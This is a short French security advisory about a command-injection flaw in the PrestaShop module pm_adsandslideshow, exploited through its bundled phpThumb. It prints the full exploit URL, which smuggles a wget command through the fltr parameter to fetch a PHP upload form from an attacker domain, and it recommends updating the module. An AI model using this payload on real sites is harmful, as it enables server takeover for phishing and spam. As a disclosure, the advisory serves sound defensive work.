Après recherches sur internet, cette faille ne semble pas être rendue publique, et à ce stade vérifiée sur une version 1.6.0.9. Nous pensons néanmoins qu'elle ne date pas d'hier.

L'attaquant injecte un fichier sur votre serveur dans le répertoire modules/pm_adsandslideshow/phpThumb/ en se servant du code suivant dans l'url de votre domaine (method GET) :

modules/pm_adsandslideshow/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ;wget http://un-domaine-secret.com/libraries/novo/wp.php;&phpThumbDebug=9

Nous ne divulgons pas le domaine en gras par mesure de sécurité. Il est d'ailleurs fort probable que les responsables de ce domaine effacent prochainement les fichiers qui permettent l'utilisation de cette faille.

Si vous pensez être vulnérable contactez-nous en message privé, nous testerons votre domaine.

Le fichier wp.php ainsi déposé est un formulaire d'upload qui permet de charger ensuite ce qu'on veut. Il pourrait porter sans nul doute un autre nom dans votre répertoire, ou se situer ailleurs. La plupart du temps les attaquants uploadent un fichier très connu permettant de prendre le contrôle d'un site, voire d'un serveur en vue de pratiquer phishing, spaming et pharmahack. De quoi vous faire blacklister en quelques minutes.

C'est sous la version 1.3.2 du module adsandslideshow que cette faille a été exploitée pour ceux qui l'auraient encore. Comblée par un fix sur la 1.4. Nous recommandons vivement la mise à jour vers la version 1.5.6.